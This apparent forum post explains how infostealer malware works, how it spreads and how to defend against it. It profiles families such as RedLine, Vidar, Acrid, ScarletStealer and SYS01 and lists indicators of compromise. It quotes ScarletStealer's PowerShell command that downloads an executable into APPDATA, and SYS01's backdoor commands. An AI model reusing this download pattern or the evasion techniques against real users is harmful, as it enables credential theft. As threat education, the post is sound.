Anonymity Theft without noise: how Stealers work?

[Fixxx]

Stealers: One of the Most Common and Deceptive Types of Viruses. They can deceive antivirus software, escape sandboxes and self-delete from the victim's device. Moreover, a malicious actor wishing to steal information doesn't need to be a genius hacker; it's sufficient to simply rent a stealer and use it for their purposes. In this article, we will discuss how stealers work, their characteristics and ways to protect against them.

How Stealers Work​

Stealers steal usernames, passwords and other information from the victim and then send this data to the attacker over the internet. The first stealers were quite primitive and designed to steal passwords and other personal information stored in browsers. Over time, they have evolved, becoming more complex and dangerous. It's important to remember that stealers attack not only stationary PCs but also phones, tablets, smartwatches and smart home systems - any device that can collect, process and store data will always be of interest to attackers. Modern stealers can steal data not only from browsers but also from other applications, including messengers, social networks and payment systems. For example, the stealer "(s)AINT" takes screenshots, records all information entered via the keyboard and even uses the webcam to take photos. The virus Mystic Stealer, discovered in 2023, steals user data from crypto wallets and applications. Mystic Stealer can steal data from 40 browsers, including popular ones like Chrome, Edge, Firefox and Opera. It's difficult to say that they have undergone significant changes. Rather, their numbers have increased significantly - especially in open sources like GitHub.

How Stealers Infect Devices​

Stealers can enter a user's device in various ways: by visiting infected websites, opening malicious files from emails, etc. For example, attackers disguised the RedLine Stealer virus as a Windows 11 update. They created a Microsoft look-alike site at the domain windows-upgraded.com, from which they distributed malware disguised as an installer. There are many methods of "delivery" for stealers; here are a few:

1. Distribution through various forums and blogs, such as cryptocurrency mining or gaming forums. The attacker posts a download link for special software (in the case of cryptocurrency forums) or disguises it as mods (in the case of gaming forums).
2. Posting links on video hosting sites. Here, there are several options: the cybercriminal uploads a video to their channel and attaches a malicious link in the comments or posts a link in the comments of someone else's video.
3. Phishing on social networks and via email. This spreads similarly to forums. The scammer looks for posts with giveaways, copies the administrator's account and then sends messages to group users with information about winning, which contains malware in the form of a link or attachment.
4. Exploit usage. The goal of a cyberattack may be to gain control over the system to elevate privileges or conduct a DoS attack to disrupt system functionality.
5. Installation of illegitimate programs. Hackers disguise programs that include malware as legitimate ones. The user downloads and installs the program and along with it, the stealer is installed.
6. Injection of web scripts on websites and in advertisements. When a user visits an infected site or sees an infected ad, the stealer can download and install itself on the device.
7. Infection via removable media. This was previously a more popular form of malware distribution. Users utilize unverified infected USB drives, SD cards and other removable devices.

According to a report by F.A.C.C.T. for 2023, the FormBookFormgrabber and Loki PWS stealers rank second and third in prevalence in phishing campaigns.

Threats and Consequences of Stealers​

Some stealers may not activate immediately and have a self-deletion function to make their presence harder to detect. In such cases, the user may not even realize that their data has been stolen and may not take any action. The danger of stealers also lies in the fact that modern viruses have learned to bypass antivirus programs and solutions, such as EDR. Over time, stealers have begun to use more sophisticated masking methods, such as polymorphism and crypters, allowing them to evade antivirus systems. They can now steal not only passwords and files, but also banking data, cryptocurrency and other valuable information. Delivery methods include personalized phishing attacks and advanced social engineering techniques. Modern stealers are often part of multifunctional malware packages that include ransomware, cryptocurrency miners and remote access tools. Attackers use cryptocurrencies to collect ransoms, making them harder to trace.

Currently, attackers don't necessarily have to create their own stealers. Some can be purchased in the dark web as Malware as a Service and obtained via subscription. The information collected by stealers can be used by attackers to extort money, inflict reputational damage on companies or sell the data to third parties. The main distinguishing feature of stealers is the constantly growing number of user programs from which they can steal various information, primarily authentication data. If a program gains noticeable popularity in a certain region, stealer developers adapt their software to maintain the ability to steal data stored within it. This is due to the high competition in the stealer development market. According to information published by researchers at F.A.C.C.T, popular stealers among Russian-speaking cybercriminals, such as RedLine and Racoon, collect the following data:

• Username
• Device name
• Hardware details
• List of installed software
• Saved passwords, cookies, banking card data and cryptocurrency wallet information from browsers.

If a user has logged into their accounts on various services and social networks, attackers can gain access to them. They don't even need to enter a password - it's enough to load cookies from the browser. Stolen accounts can be used to send spam. The Vidar stealer, first discovered in 2018 and operating worldwide, can collect a wide range of confidential data from browsers and digital wallets. It's likely a descendant or direct evolution of the Arkei trojan, which served a similar purpose. Additionally, it's used as a loader for ransomware. The creators of the virus sold it on the dark web and reported the following functionalities:

• Collection of autofill data, cookies and credit card information
• Collection of browsing history and downloaded web pages
• Interception of message history from Telegram
• Theft of cryptocurrency wallet addresses
• Theft of files of specific formats
• Taking screenshots.

Furthermore, Vidar can transmit information about installed software, the latest downloaded files (in the "Downloads" folder), cryptocurrency wallets, autofill data, cookies, browsing history and files of certain formats.

Methods of Protection Against Stealers​

To protect against stealers, it is essential to follow basic cybersecurity rules. Here are several recommendations:

1. Don't open suspicious files in emails, messengers.
2. Regularly update software and antivirus programs.
3. Use complex passwords that are unique for each service.
4. Don't enter confidential information on sites you don't trust.
5. Avoid clicking on dubious links and visiting unreliable websites.
6. Don't download programs and applications from unverified sources.

To protect yourself from password theft, it's recommended not to allow browsers to remember passwords and to store them in a secure password manager.

 

[Fixxx]

Recent Malware Developments:

​

Acrid​

Acrid is a new stealer discovered in December of last year. Despite its name, it's not related to the AcridRain stealer. Acrid is written in C++ for 32-bit systems, although most systems today are 64-bit. Upon closer examination, the reason for compiling for a 32-bit environment becomes clear: the developer decided to use the Heaven’s Gate technique. This technique allows 32-bit applications to access a 64-bit environment to bypass certain security measures.

​

*Implementation of the Heaven's Gate technique in the Acrid Stealer​

The functionality of the Acrid stealer is typical for malware of this type:

• Theft of browser data (cookies, passwords, other login information, banking card data, etc)
• Theft of credentials from installed applications (FTP managers, messengers and others)
• Theft of files with specific names (wallet.dat, password.docx, etc.)
• Theft of local cryptocurrency wallets.

The collected data is archived and sent to the attacker’s command server. The complexity level of the stealer can be assessed as medium. It contains some sophisticated details, such as string encryption, but lacks anything innovative.

ScarletStealer​

This is quite an unusual stealer: most of its functionality is contained in other binary files (applications and Chrome extensions) that it downloads. To be more precise, when ScarletStealer is launched, it searches for cryptocurrencies and crypto wallets by checking specific folder paths (e.g., %APPDATA%\Roaming\Exodus). If the stealer finds something, it begins downloading additional executable files using the following PowerShell command:

powershell.exe -Command "Invoke-WebRequest -Uri 'https://.........exe' -​

OutFile $env:APPDATA\\.........exe"​

Among the binaries it downloads are metaver_.exe (used to steal content from Chrome extensions), meta.exe (modifies the Chrome shortcut to launch with the malicious extension) and others. Most of the executable files of ScarletStealer have a digital signature.

​

*Metamask Data Interception Feature​

​

The stealer is very underdeveloped in terms of functionality and contains many bugs, unfinished features and redundant code. For example, it attempts to establish persistence in the system by creating a registry key for autostart. This registry key contains a path to the file Runtimebroker_.exe - however, there is no code in any of the stealer's files that references any executable file with that name. Therefore, it's quite strange that this stealer is distributed through a long chain of loaders (the last of which is Penguish) and is signed with a digital certificate. One would expect that all these efforts would culminate in the loading of something more advanced than ScarletStealer. Victims of this stealer are primarily located in Brazil, Turkey, Indonesia, Algeria, Egypt, India, Vietnam, the USA, South Africa and Portugal.

​

Sys01​

SYS01 (also known as Album Stealer or S1deload Stealer) is a relatively unknown stealer that has existed at least since 2022. It has already been described by Bitdefender, Zscaler and Morphisec. Their reports trace the evolution from a C# stealer to a PHP stealer. The only thing that hasn't changed in the new version of the stealer is the infection vector. As before, users are tricked into downloading a malicious ZIP archive disguised as adult video content through a Facebook page:

​

*Malicious ZIP Archive Advertisement on a Hacked Facebook Page​

The archive contains a legitimate binary file (in this case, WdSyncservice.exe, renamed to PlayVideoFull.exe), which loads a malicious DLL library named WDSync.dll. The DLL opens adult videos while simultaneously launching the next payload, which is a malicious PHP file encoded with ionCube. This PHP file, in turn, calls the install.bat script, which executes a PowerShell command to launch the next stage. This stage is called runalayer and runs what appears to be the final payload, called Newb. However, there is a difference between the latest version of the stealer and previous publicly disclosed versions, which lies in the split functionality. The stealer in its current form (Newb) contains functionality for stealing Facebook-related data and for sending stolen browser data to the attacker’s command server, organized in a specificdirectory structure. It also has backdoor functions and can execute, among others, the following commands:

​

dll	Download a file, terminate all specified processes and launch a new process using PowerShell (the command decrypts, unpacks and runs the specified file). The PowerShell procedure works similarly to previous observed versions.
cmd	Terminate processes from a specified list and launch a new process.
dls	Download a file, terminate all specified processes and launch a new specified process.

Victims of this campaign have been found worldwide, but most of them are in Algeria (just over 15%). This is likely related to the infection vector, which may be highly localized. The malware developers prefer top-level domains like .top.

Indicators of Compromise​

Acrid

• abceb35cf20f22fd8a6569a876e702cb
• 2b71c81c48625099b18922ff7bebbf51
• b9b83de1998ebadc101ed90a6c312da8

ScarletStealer

• 1d3c3869d682fbd0ae3151b419984771
• c0cf3d6d40a3038966f2a4f5bfe2b7a7
• f8b2b941cffb9709ce8f422f193696a0

Sys01

• 0x6e2b16cc41de627eb7ddcd468a037761
• 0x21df3a69540c6618cfbdaf84fc71031c
• 0x23ae473bc44fa49b1b221150e0166199

Conclusion​

Stealers are dangerous due to their consequences. These programs steal passwords and other confidential information, which can subsequently be used for other malicious purposes, leading to significant financial losses at the very least. To protect yourself from stealers and other threats, it's important to follow several basic cybersecurity hygiene rules: always install the latest security patches for your software, don't download files from dubious sources and don't open attachments in suspicious emails. For added confidence, consider implementing a protective solution that monitors events on your computer.